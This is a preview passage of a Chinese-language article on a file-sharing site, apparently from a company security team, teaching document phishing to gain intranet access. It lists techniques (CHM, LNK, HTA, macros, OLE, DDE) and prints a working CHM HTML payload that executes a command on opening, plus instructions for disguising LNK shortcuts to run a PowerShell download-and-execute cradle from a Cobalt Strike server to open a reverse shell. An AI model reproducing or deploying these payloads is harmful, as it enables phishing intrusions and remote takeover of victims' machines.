没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
陌陌分享 | 文档钓鱼
沃·兹基硕德小贴士
分享时间到!
作者述:见解有限,文章内容如有不当之处,请多多指正。
文档钓鱼至今仍是一种主流的钓鱼方式 ,对于一些难于通过 web 漏洞攻入内网的企业,使用鱼叉、水坑等方式进行钓鱼
攻击,可能是拿到内网权限的捷径。
我了解到使用文档进行钓鱼的方式大致分为CHM、LNK、HTA文件钓鱼、macros(office 宏)、OLE(对象链接与嵌
入)、DDE(动态数据交换)、利用 office的历史CVE漏洞。
CHM、LNK、HTA文件钓鱼
CHM
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用 HTML 作源文,把帮
助内容以类似数据库的形式编译储存。
使用 EasyCHM 可以轻松的新建一个 chm 文件,首先新建一个文件夹,然后在文件夹中新建一个 html 文件,html 代
码如下。
1
2
3
4
5
6
7
8
9
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head
><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1
height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
残笑 今天陌陌安全
打开 EasyCHM,点击新建,选择这个文件夹,即可搜索到这个 html,如下:
点击编译,即可编译出 chm 文件 ,双击该 chm 文件, 即可执行命令,此处为打开 计算器。
LNK
lnk 文件是用于指向其他文件的一 种文件。这些文件通常称为 快捷方式文件,通常它以快 捷方式放在硬盘上,以方便 使
用者快速的调用。
lnk 钓鱼主要是将图标伪装成正常 图标,而执行目标为要执行 的命令,如下所示:
10
11
12
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
payload:
使用 Cobalt Strike 的 Attacks->Web Drive-by->Scripted Web Delivery 功能可以建立一个脚本分发站点,建立成功
后会提示使用类似 powershell.exe -nop -c -w "IEX ((new-object net.webclient).downloadstring('http://ip/uri'))" 的命
令来下载对应 listener 反弹 beacon 的脚本。
将这段命令拼接到 payload 中,设置给快捷方式的目标,就可以作为钓鱼的文档了。当受害者双击这个快捷方式时,
会通过 cmd 运行 powershell 下载脚本,然后再运行脚本反弹 shell。
1
%SystemRoot%\system32\cmd.exe cmd /c 要执行的命令
剩余12页未读,继续阅读
资源评论
林书尼
- 粉丝: 20
- 资源: 315
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 使用 Python 和 Pygame 开发《星露谷物语》 游戏+源码(毕业设计&课程设计&项目开发)
- VOC4-123-1-321-32-1
- 【课程设计全套资料】一个基于JAVA-JSP企业合同管理系统
- bootstrap的css和js文件
- lda代码-checkpoint-checkpoint.ipynb
- 基于java局域网飞鸽传书软件设计与实现(源代码+论文).zip
- 基于python开发的魂斗罗游戏+源码(毕业设计&课程设计&项目开发)
- 停车场管理系统系统采用JAVAEE,利用SQLSERVER2005,B/S架构
- VOC数据集1-111111
- 基于python开发的乒乓球和滑雪游戏+源码(毕业设计&课程设计&项目开发)
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功